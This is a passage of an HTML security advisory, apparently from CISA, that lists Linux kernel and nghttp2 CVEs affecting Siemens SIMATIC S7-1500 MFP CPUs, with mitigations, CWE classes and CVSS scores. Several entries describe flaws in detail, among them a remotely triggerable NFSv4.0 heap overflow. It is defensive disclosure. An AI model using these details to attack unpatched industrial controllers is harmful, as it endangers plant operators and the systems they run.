<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/911.html">CWE-911 Improper Update of Reference Count</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23463</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: soc: fsl: qbman: fix race condition in qman_destroy_fq When QMAN_FQ_FLAG_DYNAMIC_FQID is set, there's a race condition between fq_table[fq-&gt;idx] state and freeing/allocating from the pool and WARN_ON(fq_table[fq-&gt;idx]) in qman_create_fq() gets triggered. Indeed, we can have: Thread A Thread B qman_destroy_fq() qman_create_fq() qman_release_fqid() qman_shutdown_fq() gen_pool_free() -- At this point, the fqid is available again -- qman_alloc_fqid() -- so, we can get the just-freed fqid in thread B -- fq-&gt;fqid = fqid; fq-&gt;idx = fqid * 2; WARN_ON(fq_table[fq-&gt;idx]); fq_table[fq-&gt;idx] = fq; fq_table[fq-&gt;idx] = NULL; And adding some logs between qman_release_fqid() and fq_table[fq-&gt;idx] = NULL makes the WARN_ON() trigger a lot more. To prevent that, ensure that fq_table[fq-&gt;idx] is set to NULL before gen_pool_free() is called by using smp_wmb().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23463">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/367.html">CWE-367 Time-of-check Time-of-use (TOCTOU) Race Condition</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23474</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mtd: Avoid boot crash in RedBoot partition table parser Given CONFIG_FORTIFY_SOURCE=y and a recent compiler, commit 439a1bcac648 ("fortify: Use __builtin_dynamic_object_size() when available") produces the warning below and an oops. Searching for RedBoot partition table in 50000000.flash at offset 0x7e0000 ------------[ cut here ]------------ WARNING: lib/string_helpers.c:1035 at 0xc029e04c, CPU#0: swapper/0/1 memcmp: detected buffer overflow: 15 byte read of buffer size 14 Modules linked in: CPU: 0 UID: 0 PID: 1 Comm: swapper/0 Not tainted 6.19.0 #1 NONE As Kees said, "'names' is pointing to the final 'namelen' many bytes of the allocation ... 'namelen' could be basically any length at all. This fortify warning looks legit to me -- this code used to be reading beyond the end of the allocation." Since the size of the dynamic allocation is calculated with strlen() we can use strcmp() instead of memcmp() and remain within bounds.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23474">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/805.html">CWE-805 Buffer Access with Incorrect Length Value</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23475</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: spi: fix statistics allocation The controller per-cpu statistics is not allocated until after the controller has been registered with driver core, which leaves a window where accessing the sysfs attributes can trigger a NULL-pointer dereference. Fix this by moving the statistics allocation to controller allocation while tying its lifetime to that of the controller (rather than using implicit devres).</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23475">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/824.html">CWE-824 Access of Uninitialized Pointer</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-27135</a></h3>
<div class="csaf-accordion-content">
<p>nghttp2 is an implementation of the Hypertext Transfer Protocol version 2 in C. Prior to version 1.68.1, the nghttp2 library stops reading the incoming data when user facing public API `nghttp2_session_terminate_session` or `nghttp2_session_terminate_session2` is called by the application. They might be called internally by the library when it detects the situation that is subject to connection error. Due to the missing internal state validation, the library keeps reading the rest of the data after one of those APIs is called. Then receiving a malformed frame that causes FRAME_SIZE_ERROR causes assertion failure. nghttp2 v1.68.1 adds missing state validation to avoid assertion failure. No known workarounds are available.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-27135">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/617.html">CWE-617 Reachable Assertion</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31389</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: spi: fix use-after-free on controller registration failure Make sure to deregister from driver core also in the unlikely event that per-cpu statistics allocation fails during controller registration to avoid use-after-free (of driver resources) and unclocked register accesses.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31389">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/825.html">CWE-825 Expired Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31391</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: crypto: atmel-sha204a - Fix OOM -&gt;tfm_count leak If memory allocation fails, decrement -&gt;tfm_count to avoid blocking future reads.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31391">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/911.html">CWE-911 Improper Update of Reference Count</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31396</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: macb: fix use-after-free access to PTP clock PTP clock is registered on every opening of the interface and destroyed on every closing. However it may be accessed via get_ts_info ethtool call which is possible while the interface is just present in the kernel. BUG: KASAN: use-after-free in ptp_clock_index+0x47/0x50 drivers/ptp/ptp_clock.c:426 Read of size 4 at addr ffff8880194345cc by task syz.0.6/948 CPU: 1 PID: 948 Comm: syz.0.6 Not tainted 6.1.164+ #109 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.1-0-g3208b098f51a-prebuilt.qemu.org 04/01/2014 Call Trace: __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x8d/0xba lib/dump_stack.c:106 print_address_description mm/kasan/report.c:316 [inline] print_report+0x17f/0x496 mm/kasan/report.c:420 kasan_report+0xd9/0x180 mm/kasan/report.c:524 ptp_clock_index+0x47/0x50 drivers/ptp/ptp_clock.c:426 gem_get_ts_info+0x138/0x1e0 drivers/net/ethernet/cadence/macb_main.c:3349 macb_get_ts_info+0x68/0xb0 drivers/net/ethernet/cadence/macb_main.c:3371 __ethtool_get_ts_info+0x17c/0x260 net/ethtool/common.c:558 ethtool_get_ts_info net/ethtool/ioctl.c:2367 [inline] __dev_ethtool net/ethtool/ioctl.c:3017 [inline] dev_ethtool+0x2b05/0x6290 net/ethtool/ioctl.c:3095 dev_ioctl+0x637/0x1070 net/core/dev_ioctl.c:510 sock_do_ioctl+0x20d/0x2c0 net/socket.c:1215 sock_ioctl+0x577/0x6d0 net/socket.c:1320 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:870 [inline] __se_sys_ioctl fs/ioctl.c:856 [inline] __x64_sys_ioctl+0x18c/0x210 fs/ioctl.c:856 do_syscall_x64 arch/x86/entry/common.c:46 [inline] do_syscall_64+0x35/0x80 arch/x86/entry/common.c:76 entry_SYSCALL_64_after_hwframe+0x6e/0xd8 Allocated by task 457: kmalloc include/linux/slab.h:563 [inline] kzalloc include/linux/slab.h:699 [inline] ptp_clock_register+0x144/0x10e0 drivers/ptp/ptp_clock.c:235 gem_ptp_init+0x46f/0x930 drivers/net/ethernet/cadence/macb_ptp.c:375 macb_open+0x901/0xd10 drivers/net/ethernet/cadence/macb_main.c:2920 __dev_open+0x2ce/0x500 net/core/dev.c:1501 __dev_change_flags+0x56a/0x740 net/core/dev.c:8651 dev_change_flags+0x92/0x170 net/core/dev.c:8722 do_setlink+0xaf8/0x3a80 net/core/rtnetlink.c:2833 __rtnl_newlink+0xbf4/0x1940 net/core/rtnetlink.c:3608 rtnl_newlink+0x63/0xa0 net/core/rtnetlink.c:3655 rtnetlink_rcv_msg+0x3c6/0xed0 net/core/rtnetlink.c:6150 netlink_rcv_skb+0x15d/0x430 net/netlink/af_netlink.c:2511 netlink_unicast_kernel net/netlink/af_netlink.c:1318 [inline] netlink_unicast+0x6d7/0xa30 net/netlink/af_netlink.c:1344 netlink_sendmsg+0x97e/0xeb0 net/netlink/af_netlink.c:1872 sock_sendmsg_nosec net/socket.c:718 [inline] __sock_sendmsg+0x14b/0x180 net/socket.c:730 __sys_sendto+0x320/0x3b0 net/socket.c:2152 __do_sys_sendto net/socket.c:2164 [inline] __se_sys_sendto net/socket.c:2160 [inline] __x64_sys_sendto+0xdc/0x1b0 net/socket.c:2160 do_syscall_x64 arch/x86/entry/common.c:46 [inline] do_syscall_64+0x35/0x80 arch/x86/entry/common.c:76 entry_SYSCALL_64_after_hwframe+0x6e/0xd8 Freed by task 938: kasan_slab_free include/linux/kasan.h:177 [inline] slab_free_hook mm/slub.c:1729 [inline] slab_free_freelist_hook mm/slub.c:1755 [inline] slab_free mm/slub.c:3687 [inline] __kmem_cache_free+0xbc/0x320 mm/slub.c:3700 device_release+0xa0/0x240 drivers/base/core.c:2507 kobject_cleanup lib/kobject.c:681 [inline] kobject_release lib/kobject.c:712 [inline] kref_put include/linux/kref.h:65 [inline] kobject_put+0x1cd/0x350 lib/kobject.c:729 put_device+0x1b/0x30 drivers/base/core.c:3805 ptp_clock_unregister+0x171/0x270 drivers/ptp/ptp_clock.c:391 gem_ptp_remove+0x4e/0x1f0 drivers/net/ethernet/cadence/macb_ptp.c:404 macb_close+0x1c8/0x270 drivers/net/ethernet/cadence/macb_main.c:2966 __dev_close_many+0x1b9/0x310 net/core/dev.c:1585 __dev_close net/core/dev.c:1597 [inline] __dev_change_flags+0x2bb/0x740 net/core/dev.c:8649 dev_change_fl ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31396">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/825.html">CWE-825 Expired Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31402</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: nfsd: fix heap overflow in NFSv4.0 LOCK replay cache The NFSv4.0 replay cache uses a fixed 112-byte inline buffer (rp_ibuf[NFSD4_REPLAY_ISIZE]) to store encoded operation responses. This size was calculated based on OPEN responses and does not account for LOCK denied responses, which include the conflicting lock owner as a variable-length field up to 1024 bytes (NFS4_OPAQUE_LIMIT). When a LOCK operation is denied due to a conflict with an existing lock that has a large owner, nfsd4_encode_operation() copies the full encoded response into the undersized replay buffer via read_bytes_from_xdr_buf() with no bounds check. This results in a slab-out-of-bounds write of up to 944 bytes past the end of the buffer, corrupting adjacent heap memory. This can be triggered remotely by an unauthenticated attacker with two cooperating NFSv4.0 clients: one sets a lock with a large owner string, then the other requests a conflicting lock to provoke the denial. We could fix this by increasing NFSD4_REPLAY_ISIZE to allow for a full opaque, but that would increase the size of every stateowner, when most lockowners are not that large. Instead, fix this by checking the encoded response length against NFSD4_REPLAY_ISIZE before copying into the replay buffer. If the response is too large, set rp_buflen to 0 to skip caching the replay payload. The status is still cached, and the client already received the correct response on the original request.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31402">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31403</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: NFSD: Hold net reference for the lifetime of /proc/fs/nfs/exports fd The /proc/fs/nfs/exports proc entry is created at module init and persists for the module's lifetime. exports_proc_open() captures the caller's current network namespace and stores its svc_export_cache in seq-&gt;private, but takes no reference on the namespace. If the namespace is subsequently torn down (e.g. container destruction after the opener does setns() to a different namespace), nfsd_net_exit() calls nfsd_export_shutdown() which frees the cache. Subsequent reads on the still-open fd dereference the freed cache_detail, walking a freed hash table. Hold a reference on the struct net for the lifetime of the open file descriptor. This prevents nfsd_net_exit() from running -- and thus prevents nfsd_export_shutdown() from freeing the cache -- while any exports fd is open. cache_detail already stores its net pointer (cd-&gt;net, set by cache_create_net()), so exports_release() can retrieve it without additional per-file storage.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31403">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
